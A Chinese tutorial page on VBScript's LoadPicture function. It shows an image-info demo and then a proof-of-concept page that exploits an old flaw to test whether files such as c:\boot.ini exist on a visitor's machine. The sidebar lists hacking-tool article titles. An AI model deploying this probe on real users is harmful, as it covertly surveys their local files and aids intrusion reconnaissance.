当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > vbscript LoadPicture函数使用方法与漏洞利用

VBScript
VBS脚本加密/解密VBS脚本(简易免杀版1.1)
刷QQ群的VBS脚本
vbs屏蔽键盘按键
alpha2 shellcode解密的vbs脚本
非常棒的lcx写的非常规运行vbs
vbs算命测试一下你上辈子是男是女
vbs版的解密base64加密的脚本
更牛的一句话asp木马加密(去掉asp里的%)
用vbs发送带附件的邮件
VBScript开发自动化测试脚本的方法分析
Imail密码加密算法及VBS实现
用vbs判断系统补丁的脚本
管理网卡vbs脚本
用vbs写的短小精悍的字典生成器
把任意文件转成vbs文件的file2vbs的vbs代码
用vbs实现获取电脑硬件信息的脚本_最新版
windows2003一句话开3389的vbs代码
vbs实现无黑框无DOS窗口隐藏批处理运行窗口
vbs输入助手执行会调用好多乱的进程
批量文件查找替换功能的vbs脚本

VBScript 中的 vbscript LoadPicture函数使用方法与漏洞利用


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 86 ::
收藏到网摘: n/a

by:lcx
示例:
<title>LoadPicture函数</title>
<form name="frm">
选择图片<input type="file" name="pic" onChange="GetPicInfor()" >
</form>
<script language="vbscript">
Sub GetPicInfor()
dim objpic,iWidth,iHeight
dim pictype,picpath
picpath=document.frm.pic.value
set objpic=Loadpicture(picpath)
iWidth = round(objpic.width / 26.4583) ‘26.4583是像素值
iHeight = round(objpic.height / 26.4583)
select case objpic.type
case 0
pictype = "None"
case 1
pictype = "Bitmap"
case 2
pictype = "Metafile"
case 3
pictype = "Icon"
case 4
pictype = "Win32-enhanced metafile"
end select
document.write "你选择了图片"&picpath
document.write "<li>长度:"&iHeight&"</li>"
document.write "<li>宽度:"&iwidth&"</li>"
document.write "<li>类型:"&pictype&"</li>"
End Sub
</script>
=============================
不过这个函数有个漏洞,可以探测电脑上存在的文件名。2004年的漏洞,微软现在也没补,示例:
<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>
<script language="vbscript">
Sub loadIt(filename)
LoadPicture(filename)
End Sub
</script>
<script language="javascript">
function doIt(form) {
try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}
if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>